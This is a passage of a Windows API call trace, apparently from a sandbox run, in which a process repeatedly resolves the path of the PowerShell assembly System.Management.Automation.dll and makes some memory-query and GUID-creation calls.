[0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 [0152.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.256] GetLastError () returned 0x0 [0152.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.257] GetLastError () returned 0x0 [0152.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.257] GetLastError () returned 0x0 [0152.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.257] GetLastError () returned 0x0 [0152.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.257] GetLastError () returned 0x0 [0152.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.257] GetLastError () returned 0x0 [0152.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.257] GetLastError () returned 0x0 [0152.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.257] GetLastError () returned 0x0 [0152.257] VirtualQuery (in: lpAddress=0x12d064, lpBuffer=0x12e064, dwLength=0x1c | out: lpBuffer=0x12e064*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.257] VirtualQuery (in: lpAddress=0x12d0a0, lpBuffer=0x12e0a0, dwLength=0x1c | out: lpBuffer=0x12e0a0*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.258] GetLastError () returned 0x0 [0152.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.258] GetLastError () returned 0x0 [0152.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.258] GetLastError () returned 0x0 [0152.258] VirtualQuery (in: lpAddress=0x12d16c, lpBuffer=0x12e16c, dwLength=0x1c | out: lpBuffer=0x12e16c*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.258] GetLastError () returned 0x0 [0152.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.258] GetLastError () returned 0x0 [0152.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.258] GetLastError () returned 0x0 [0152.258] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x724490d0, Data2=0x8532, Data3=0x4481, Data4=([0]=0xa9, [1]=0x2, [2]=0x54, [3]=0x2e, [4]=0xcb, [5]=0x81, [6]=0x2f, [7]=0x2))) returned 0x0 [0152.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.259] GetLastError () returned 0x0 [0152.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.259] GetLastError () returned 0x0 [0152.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.259] GetLastError () returned 0x0 [0152.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.259] GetLastError () returned 0x0 [0152.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.259] GetLastError () returned 0x0 [0152.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.259] GetLastError () returned 0x0 [0152.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.259] GetLastError () returned 0x0 [0152.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.259] GetLastError () returned 0x0 [0152.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.259] GetLastError () returned 0x0 [0152.259] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xae1e7daf, Data2=0x8aca, Data3=0x488b, Data4=([0]=0xb0, [1]=0xec, [2]=0x11, [3]=0x27, [4]=0xb1, [5]=0x2d, [6]=0x45, [7]=0xd4))) returned 0x0 [0152.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.260] GetLastError () returned 0x0 [0152.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.260] GetLastError () returned 0x0 [0152.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.260] GetLastError () returned 0x0 [0152.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.260] GetLastError () returned 0x0 [0152.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.260] GetLastError () returned 0x0 [0152.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.260] GetLastError () returned 0x0 [0152.260] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x84be21b3, Data2=0xb5b1, Data3=0x4772, Data4=([0]=0xad, [1]=0xae, [2]=0xe7, [3]=0xbf, [4]=0x38, [5]=0xd7, [6]=0xf6, [7]=0xcd))) returned 0x0 [0152.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.260] GetLastError () returned 0x0 [0152.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.260] GetLastError () returned 0x0 [0152.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.261] GetLastError () returned 0x0 [0152.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.261] GetLastError () returned 0x0 [0152.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.261] GetLastError () returned 0x0 [0152.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.261] GetLastError () returned 0x0 [0152.261] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x1666be14, Data2=0x2047, Data3=0x49db, Data4=([0]=0xb2, [1]=0xbd, [2]=0x58, [3]=0x60, [4]=0xcb, [5]=0x9d, [6]=0xdf, [7]=0xad))) returned 0x0 [0152.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.261] GetLastError () returned 0x0 [0152.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.261] GetLastError () returned 0x0 [0152.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.261] GetLastError () returned 0x0 [0152.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.261] GetLastError () returned 0x0 [0152.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.261] GetLastError () returned 0x0 [0152.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.261] GetLastError () returned 0x0 [0152.262] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x2491d66, Data2=0x1fe8, Data3=0x4a53, Data4=([0]=0x85, [1]=0x5c, [2]=0x3f, [3]=0x92, [4]=0x1a, [5]=0xd6, [6]=0x6d, [7]=0xf9))) returned 0x0 [0152.262] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xa020ab8, Data2=0xf8b6, Data3=0x41d7, Data4=([0]=0x9e, [1]=0x12, [2]=0x96, [3]=0x60, [4]=0x19, [5]=0xd, [6]=0xf9, [7]=0xa7))) returned 0x0 [0152.262] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x603cb2f1, Data2=0xc8c, Data3=0x4a44, Data4=([0]=0xb3, [1]=0x82, [2]=0x4f, [3]=0x37, [4]=0xe9, [5]=0xca, [6]=0x93, [7]=0x12))) returned 0x0 [0152.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.262] GetLastError () returned 0x0 [0152.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.262] GetLastError () returned 0x0 [0152.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.262] GetLastError () returned 0x0 [0152.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.262] GetLastError () returned 0x0 [0152.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.262] GetLastError () returned 0x0 [0152.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.262] GetLastError () returned 0x0 [0152.262] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x471056cc, Data2=0xb0d1, Data3=0x40c2, Data4=([0]=0xa6, [1]=0xcf, [2]=0xdc, [3]=0xb6, [4]=0xdd, [5]=0x2f, [6]=0xc2, [7]=0x5))) returned 0x0 [0152.263] VirtualQuery (in: lpAddress=0x12cfc4, lpBuffer=0x12dfc4, dwLength=0x1c | out: lpBuffer=0x12dfc4*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.263] GetLastError () returned 0x0 [0152.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.263] GetLastError () returned 0x0 [0152.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.263] GetLastError () returned 0x0 [0152.263] VirtualQuery (in: lpAddress=0x12cfc4, lpBuffer=0x12dfc4, dwLength=0x1c | out: lpBuffer=0x12dfc4*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.263] VirtualQuery (in: lpAddress=0x12d000, lpBuffer=0x12e000, dwLength=0x1c | out: lpBuffer=0x12e000*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.264] GetLastError () returned 0x0 [0152.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.264] GetLastError () returned 0x0 [0152.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.264] 